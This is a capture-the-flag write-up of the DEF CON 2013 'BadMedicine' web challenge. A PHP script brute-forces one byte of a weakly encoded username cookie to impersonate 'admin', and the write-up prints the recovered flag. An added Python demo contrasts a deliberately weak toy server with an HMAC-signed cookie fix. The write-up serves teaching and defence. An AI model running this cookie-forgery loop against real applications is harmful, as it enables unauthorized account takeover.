Writeup: DEF CON 2013 - BadMedicine

Information

  • Category: web

Writeup

Challenge was available at
http://badmedicine.shallweplayaga.me:8042 where we found a login form:

[screenshot: login form]

We tried a simple login and we got to this page:

[screenshot: page shown after the login attempt]

So we were in the right place but with the wrong credentials.

Looking at cookies we found this:

username=32c93a9a8168a1563709

Read as a hex string, this cookie has exactly as many bytes as the username we typed in, but the byte values do not match the ASCII codes of the characters.

So we logged in as "admi", copied the resulting cookie and brute-forced the last character with this script:

    <?php
    // Bruteforce to find the 'n': the first four bytes (09c8259c) are the
    // cookie the server handed us for "admi"; only the fifth byte is unknown.
    for ($c = 0; $c < 256; $c++) {
        echo "\rTrying $c...";
        $cookie = sprintf("username=09c8259c%02x", $c);
        $ch = curl_init('http://badmedicine.shallweplayaga.me:8042/welcome');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        $res = curl_exec($ch);
        curl_close($ch);
        // The welcome page prints the key only for the admin user.
        if (preg_match('/The key is:\s+([\w ]+)/', $res, $key)) {
            echo "\rKey FOUND: {$key[1]}" . PHP_EOL;
            exit;
        }
    }
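Why does a 256-request loop break the session cookie? Because the server encodes the username byte by byte and then trusts the cookie on its own, so each byte can be guessed independently against the /welcome oracle instead of having to guess the whole value at once. The following Python is an added example, not code from the challenge or the writeup: it models the server with a toy per-position XOR keystream (an assumption; the real transform was never revealed), runs the same last-byte brute force against it, and then runs the identical loop against a cookie carrying an HMAC over the username, where a one-byte change invalidates the whole tag and the loop finds nothing. All function names, the keystream and the server key are constructed for the example.

```python
import hashlib
import hmac
import re
import secrets

FLAG = "who wants oatmeal raisin anyways twumpAdby"

# --- Toy vulnerable server (constructed) -------------------------------------
# ASSUMPTION: the cookie is the username XORed with a fixed per-position
# keystream. This reproduces what the writeup observed: same length as the
# username, bytes that are not the ASCII codes, and each byte independent.
_KEYSTREAM = bytes([0x41, 0xA8, 0x57, 0xE6, 0x3C, 0x9A, 0xD1, 0x22])


def weak_encode(username: bytes) -> str:
    """Cookie value the toy server hands out after login."""
    return bytes(b ^ k for b, k in zip(username, _KEYSTREAM)).hex()


def weak_decode(cookie_hex: str) -> bytes:
    return bytes(b ^ k for b, k in zip(bytes.fromhex(cookie_hex), _KEYSTREAM))


def weak_welcome(cookie_hex: str) -> str:
    """Toy /welcome: trusts whatever the cookie decodes to."""
    username = weak_decode(cookie_hex)
    if username == b"admin":
        return "The key is: " + FLAG
    return "Hello, " + username.decode(errors="replace")


# --- Hardened server (constructed): HMAC-bound cookie -------------------------
_SERVER_KEY = secrets.token_bytes(32)


def signed_encode(username: bytes) -> str:
    """Cookie = hex(username).hex(HMAC-SHA256(key, username))."""
    tag = hmac.new(_SERVER_KEY, username, hashlib.sha256).hexdigest()
    return username.hex() + "." + tag


def signed_welcome(cookie: str) -> str:
    """Rejects any cookie whose tag does not match the username it carries."""
    try:
        user_hex, tag = cookie.split(".", 1)
        username = bytes.fromhex(user_hex)
    except ValueError:
        return "Bad cookie"
    expected = hmac.new(_SERVER_KEY, username, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return "Bad cookie"
    if username == b"admin":
        return "The key is: " + FLAG
    return "Hello, " + username.decode(errors="replace")


# --- The writeup's loop, parameterised over how a candidate cookie is built --
KEY_RE = re.compile(r"The key is:\s+([\w ]+)")


def brute_last_byte(welcome, make_cookie):
    """Try all 256 values for one byte; return (cookie, key) or None."""
    for c in range(256):
        cookie = make_cookie(c)
        m = KEY_RE.search(welcome(cookie))
        if m:
            return cookie, m.group(1)
    return None


def demo_weak():
    # Log in as "admi", keep the 4-byte prefix, guess the 5th byte.
    prefix = weak_encode(b"admi")
    return brute_last_byte(weak_welcome, lambda c: f"{prefix}{c:02x}")


def demo_signed():
    # Same idea against the signed cookie: extend the username part, reuse tag.
    user_hex, tag = signed_encode(b"admi").split(".", 1)
    return brute_last_byte(signed_welcome, lambda c: f"{user_hex}{c:02x}.{tag}")


if __name__ == "__main__":
    print("weak server:  ", demo_weak())     # finds the admin cookie and the key
    print("signed server:", demo_signed())   # None: no single byte passes the check
```

The fix is not a stronger byte transform but binding the cookie to a server-side key: with the HMAC, the cheapest route to an admin cookie is guessing the 256-bit key, not 256 HTTP requests. `hmac.compare_digest` is used so the tag comparison itself does not leak timing information.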

And the key simply came up:

Flag

Key FOUND: who wants oatmeal raisin anyways twumpAdby